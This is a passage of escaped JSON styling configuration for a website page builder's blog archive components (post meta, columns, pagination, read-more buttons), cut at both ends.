238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(238, 238, 238)\",\"width\":{\"value\":\"0\",\"unit\":\"px\"}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m7\",\"34-m7\"],\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":3}}}}},{\"id\":114,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c23\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"435-m8\",\"34-m8\"]},{\"id\":115,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m9\",\"style\":{\"descendants\":{\"icons\":{\"display\":\"none\",\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataLinks\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(0, 0, 0)\"}}}},\"metaDataPrefix\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m9\",\"34-m9\"]},{\"id\":116,\"type\":\"hop-post-title\",\"nodeId\":\"26-m10\",\"style\":{\"descendants\":{\"title\":{\"transition\":{\"duration\":{\"value\":\"0.5\"}}}}},\"v\":\"1.1\",\"nodes\":[\"435-m10\",\"34-m10\"]},{\"id\":117,\"type\":\"hop-post-excerpt\",\"nodeId\":\"26-m11\",\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m11\",\"34-m11\"]},{\"id\":118,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"equalHeight\":true,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"media\":{\"mobile\":{\"layout\":{\"itemsPerRow\":2,\"horizontalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"verticalGap\":0}}}},\"type\":\"hop-row\",\"nodeId\":\"1706-c20\",\"v\":\"1.1\",\"nodes\":[\"435-m12\",\"34-m12\"]},{\"id\":119,\"type\":\"hop-column\",\"nodeId\":\"1726-m20\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m13\",\"34-m13\"]},{\"id\":120,\"type\":\"hop-post-meta\",\"nodeId\":\"19-m25\",\"nodes\":[\"435-m14\",\"34-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"decoration\":\"none\"}},\"icons\":{\"display\":\"inline-block\",\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}}}}}},{\"id\":121,\"type\":\"hop-column\",\"nodeId\":\"1726-m21\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"},\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"}}}}},\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":2,\"vSpace\":{\"value\":\"10\"}},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":3}}}},\"v\":\"1.1\",\"nodes\":[\"435-m15\",\"34-m15\"]},{\"id\":122,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"19-m32\",\"nodes\":[\"435-m16\",\"34-m16\"],\"v\":\"1.1\"},{\"id\":123,\"type\":\"hop-post-read-more\",\"nodeId\":\"19-m33\",\"nodes\":[\"435-m17\",\"34-m17\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"}},{\"id\":124,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalAlign\":\"end\"},\"media\":{\"mobile\":{\"layout\":{\"horizontalAlign\":\"center\"}}}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"19-m36\",\"nodes\":[\"435-m18\",\"34-m18\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":125,\"type\":\"hop-column\",\"nodeId\":\"19-m37\",\"nodes\":[\"435-m19\",\"34-m19\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":126,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m20\",\"v\":\"1.1\",\"nodes\":[\"435-m20\",\"34-m20\"],\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"bottom\":{\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}}}}}}},{\"id\":127,\"type\":\"hop-column\",\"nodeId\":\"19-m39\",\"nodes\":[\"435-m21\",\"34-m21\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":128,\"type\":\"hop-archive-pagination\",\"nodeId\":\"26-m14\",\"style\":{\"descendants\":{\"paginationNumbers\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"paginationActiveNumber\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m22\",\"34-m22\"]},{\"id\":129,\"type\":\"hop-column\",\"nodeId\":\"19-m38\",\"nodes\":[\"435-m23\",\"34-m23\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"15\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":130,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"26-m21\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"border\":{\"bottom\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"top\":{\"color\":\"${theme.colors.5}\",\"radius\":{\"left\":{\"value\":0},\"right\":{\"value\":0}}},\"left\":{\"color\":\"${theme.colors.5}\"},\"right\":{\"color\":\"${theme.colors.5}\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"}}}},\"v\":\"1.1\",\"nodes\":[\"435-m24\",\"34-m24\"]},{\"id\":131,\"type\":\"hop-main\",\"nodeId\":\"35-m1\",\"v\":\"1.1\",\"nodes\":[\"636-m1\",\"37-m1\"]},{\"id\":132,\"type\":\"hop-row\",\"nodeId\":\"1735-m2\",\"props\":{\"layout\":{\"itemsPerRow\":2,\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"636-m2\",\"37-m2\"]},{\"id\":133,\"type\":\"hop-column\",\"nodeId\":\"35-m3\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"636-m3\",\"37-m3\"]},{\"id\":134,\"type\":\"hop-heading\",\"nodeId\":\"1735-m11\",\"style\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"size\":{\"unit\":\"em\",\"value\":\"10\"}}},\"props\":{\"headerType\":\"2\"},\"v\":\"1.1\",\"nodes\":[\"636-m4\",\"37-m4\"]},{\"id\":135,\"type\":\"hop-text\",\"nodeId\":\"1735-m12\",\"v\":\"1.1\",\"nodes\":[\"636-m5\",\"37-m5\"]},{\"id\":136,\"type\":\"hop-home-button-group\",\"nodeId\":\"22-m8\",\"v\":\"1.1\",\"nodes\":[\"636-m6\",\"37-m6\"]},{\"id\":137,\"type\":\"hop-home-button\",\"nodeId\":\"22-m9\",\"style\":{\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(2, 110, 159, 0)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"typography\":{\"color\":\"${theme.colors.0}\",\"transform\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.5\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}},\"left\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"none\",\"color\":\"${theme.colors.0}\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"radius\":{\"right\":{\"value\":5,\"unit\":\"px\"},\"left\":{\"value\":5,\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"0\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\"}},\"descendants\":{\"icon\":{\"size\":{\"value\":\"16\",\"unit\":\"px\"},\"margin\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"textAlign\":\"center\"},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\"},\"v\":\"1.1\",\"nodes\":[\"636-m7\",\"37-m7\"]},{\"id\":138,\"type\":\"hop-main\",\"nodeId\":\"38-m1\",\"v\":\"1.1\",\"nodes\":[\"639-m1\",\"40-m1\"]},{\"id\":139,\"type\":\"hop-archive-loop\",\"nodeId\":\"1738-m4\",\"props\":{\"layout\":{\"horizontalGap\":3,\"verticalGap\":3,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"itemsPerRow\":1,\"horizontalAlign\":\"start\",\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}}},\"showMasonry\":false,\"media\":{\"mobile\":{\"layout\":{\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":2}}}},\"v\":\"1.1\",\"nodes\":[\"639-m2\",\"40-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":140,\"type\":\"hop-loop-item\",\"nodeId\":\"1706-c10\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"y\":\"10\",\"spread\":\"0\",\"blur\":\"40\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"padding\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"639-m3\",\"40-m3\"],\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":141,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"25-m20\",\"nodes\":[\"639-m4\",\"40-m4\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":142,\"type\":\"hop-column\",\"nodeId\":\"25-m21\",\"nodes\":[\"639-m5\",\"40-m5\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"}},{\"id\":143,\"type\":\"hop-post-categories\",\"nodeId\":\"1738-m11\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"typography\":{\"transform\":\"lowercase\",\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m6\",\"40-m6\"]},{\"id\":144,\"type\":\"hop-post-title\",\"nodeId\":\"38-m7\",\"v\":\"1.1\",\"nodes\":[\"639-m7\",\"40-m7\"]},{\"id\":145,\"type\":\"hop-post-meta\",\"nodeId\":\"1706-c21\",\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"transform\":\"lowercase\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"24\"},\"width\":{\"value\":\"24\"},\"margin\":{\"right\":{\"value\":\"5\"}},\"display\":\"none\"},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant1}\"}},\"separators\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"v\":\"1.1\",\"nodes\":[\"639-m8\",\"40-m8\"]},{\"id\":146,\"type\":\"hop-post-excerpt\",\"nodeId\":\"38-m8\",\"v\":\"1.1\",\"nodes\":[\"639-m9\",\"40-m9\"],\"style\":{\"descendants\":{\"excerpt\":{\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":147,\"type\":\"hop-post-read-more-group\",\"nodeId\":\"25-m20\",\"nodes\":[\"639-m10\",\"40-m10\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":20,\"unit\":\"%\"}}}}}},{\"id\":148,\"type\":\"hop-post-read-more\",\"nodeId\":\"25-m21\",\"nodes\":[\"639-m11\",\"40-m11\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"center\",\"typography\":{\"color\":\"${theme.colors.0}\",\"family\":\"Open Sans\",\"margin\":{\"top\":\"\",\"bottom\":\"2rem\"},\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"weight\":\"400\",\"lineHeight\":{\"value\":\"1.6\",\"unit\":\"\"},\"letterSpacing\":{\"value\":\"\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"bottom\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"radius\":{\"right\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"},\"left\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"\",\"unit\":\"px\",\"path\":\"value\"}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"16\"},\"margin\":{\"left\":{\"value\":\"5\",\"unit\":\"px\",\"path\":\"value\"},\"right\":{\"value\":0,\"unit\":\"px\"}}},\"image\":{\"boxShadow\":{\"enabled\":false,\"layers\":[{\"x\":\"2\",\"y\":\"2\",\"spread\":\"10\",\"blur\":\"2\",\"color\":\"#333\"}]}},\"frameImage\":{\"backgroundColor\":\"transparent\",\"width\":{\"value\":100},\"height\":{\"value\":100},\"thickness\":10,\"border\":{\"top\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"bottom\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"left\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"},\"right\":{\"width\":{\"value\":10},\"color\":\"rgba(0, 0, 0, 0.5)\",\"style\":\"solid\"}},\"transform\":{\"translate\":{\"x\":{\"path\":\"value\"},\"x_value\":\"4\",\"y\":{\"path\":\"value\"},\"y_value\":\"6\"}},\"zIndex\":-1}}},\"props\":{\"showIcon\":true,\"iconPosition\":\"after\",\"frame\":{\"type\":\"border\"},\"enabledFrameOption\":false,\"showFrameOverImage\":false,\"showFrameShadow\":false}},{\"id\":149,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"25-m22\",\"nodes\":[\"639-m12\",\"40-m12\"],\"v\":\"1.1\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(224, 224, 224)\"}},\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"45\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}}}},{\"id\":150,\"type\":\"hop-column\",\"nodeId\":\"25-m22\",\"nodes\":[\"639-m13\",\"40-m13\"],\"v\":\"1.1\"},{\"id\":151,\"type\":\"hop-column\",\"nodeId\":\"25-m23\",\"nodes\":[\"639-m14\",\"40-m14\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":152,\"type\":\"hop-archive-nav-button\",\"nodeId\":\"1725-m29\",\"style\":{\"descendants\":{\"paginationNavigationButton\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant3}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"639-m15\",\"40-m15\"]},{\"id\":153,\"type\":\"hop-column\",\"nodeId\":\"25-m41\",\"nodes\":[\"639-m16\",\"40-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"v